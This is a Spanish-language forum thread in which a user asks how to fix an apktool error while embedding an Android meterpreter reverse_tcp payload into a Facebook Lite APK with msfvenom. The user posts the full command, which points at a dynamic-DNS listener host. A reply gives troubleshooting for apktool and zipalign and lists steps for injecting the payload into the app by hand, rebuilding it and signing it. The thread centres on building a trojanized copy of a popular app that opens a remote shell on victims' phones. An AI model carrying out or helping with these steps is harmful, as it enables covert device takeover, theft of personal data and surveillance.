Error con msfvenom Unable to rebuild apk with apktool

Iniciado por breidablik_39, Marzo 14, 2019, 03:53:34 PM

Tema anterior - Siguiente tema

0 Miembros y 1 Visitante están viendo este tema.

Mi inconveniente es que estoy usando msfvenom pero siempre que quiero incrustar la apk en otra obtengo el siguiente error

Error: Unable to rebuild apk with apktool

Este es el comando con el que intento crear

msfvenom -x /root/Descargas/FacebookLite.com.apk -p android/meterpreter/reverse_tcp LHOST=colpruebadns.hopto.org LPORT=8080 -o fblite.apk

tengo apktool 2.3.4-dirty
y mi java es 1.8
tambien tengo 1.11 pero lo cambie a 1.8

Prueba con esto

sudo apt update
sudo apt full-upgrade

y tu apktool es una version antigua la ultima es apktool_2.4.0 No tienes permitido ver los links. Registrarse o Entrar a mi cuenta  Después de descargar estos archivos, debe cambiar su nombre y permisos.

cambie el primer nombre de archivo de "apktool.txt" a "apktool" sin extensión y cambie el segundo archivo de "apktool_SOMEVERSION.jar" a apktool.jar

cambie sus permisos ejecutando "chmod + x apktool && chmod + x apktool.jar" después de cambiar el directorio a los archivos existentes. (cd path_that_these_two_files_exist)

debe comprobar dónde está su "apktool" ejecutando el comando "whereis apktool".

después de encontrar el directorio de su apktool instalado, puede eliminarlos (archivos apktool) y copiar sus nuevos archivos en su directorio (los archivos recientemente descargados que cambió de nombre y permisos en el paso tres).

206/5000
después de reemplazarlos, vuelva a revisar su versión apktool y debería cambiarse ahora, y después de intentar reconstruir su apk, verá que ya no existe el error "no se puede reconstruir apk con apktool".

si no funcionó, puede intentar eliminar todas las carpetas y archivos "apktool" existentes y ejecutar "apktool —version" para que diga "no hay tal archivo ni directoy en EXAMPLE_DIRECTORY" y debe continuar desde Paso cinco

Si no ha instalado ninguna versión de apktool, puede probarla con "sudo apt install apktool" y continuar desde el Paso Uno.

no puede instalar "zipalign" con el comando sudo apt-get install zipalign porque instalará "Google Android Build Tools" en su lugar.

Tienes que instalarlo manualmente descargándolo desde

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

e instálalo por sudo apt install ./Your_File_name.deb Command.

Si aún tiene problemas para reconstruir su apk, entonces es probable que apktool no pueda reconstruir archivos apk de gran tamaño y puede estar seguro utilizando un tamaño de apk más bajo (<5MB).

puede inyectar su carga útil manualmente y también reconstruirla manualmente con herramientas como "Android Studio" o lo que quiera.

Estos son los pasos para inyectar manualmente la carga útil en un archivo apk:

genera tu carga útil
tienes que descompilar tu apk
descompilar su carga útil
inyecte códigos de carga en el lugar correcto de su archivo apk (búsquelo)
agregue sus permisos (si está trabajando en la versión sdk +23, también debe llamar a sus permisos)
reconstruye tu carpeta inyectada al archivo apk
firma tu archivo de afk

o simplemente ocupa Android Studio

Saludos








Ayúdame si lo resolviste por qué tengo en mismo problema y no entiendo cómo solucionarlo